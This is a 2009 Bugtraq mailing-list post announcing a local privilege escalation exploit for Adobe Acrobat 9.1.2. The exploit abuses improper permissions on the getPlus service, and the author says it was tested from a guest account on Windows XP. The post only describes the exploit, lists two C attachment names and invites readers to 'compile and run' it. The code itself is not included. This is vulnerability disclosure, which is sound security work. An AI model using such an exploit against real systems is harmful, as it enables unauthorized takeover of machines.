Date: Tue, 21 Jul 2009 16:56:45 -0400
Subject: Adobe Acrobat 9.1.2 NOS Local Privilege Escalation Exploit
From: Jeremy Brown <0xjbrown41@gmail.com.>
To: bugtraq@securityfocus.com

Adobe Acrobat 9.1.2 NOS Local Privilege Escalation Exploit

This exploit is based on the brief information provided by Nine:Situations:Group (http://www.milw0rm.com/exploits/9199). Exploiting improper permissions is fun. A few notes are in order though. The getPlus service (that I tested, via 9.1.2) isn't installed as an "Automatic" service, therefore making it slightly harder (but not hard) to practically use to your advantage. But I tested running this code under a GUEST account and it worked pretty good (just the first time though). Change the values as needed, compile and run. Things could be more or less silent, lethal or non-lethal... it is completely up to you. Things cannot get much simpler than this :)

Tested on Windows XP SP3 + Adobe Acrobat 9.1.2 (installed from adobe's download manager, then updated).

Attachments: alwaysdirtyneverclean.c (text/x-csrc), bin.c (text/x-csrc)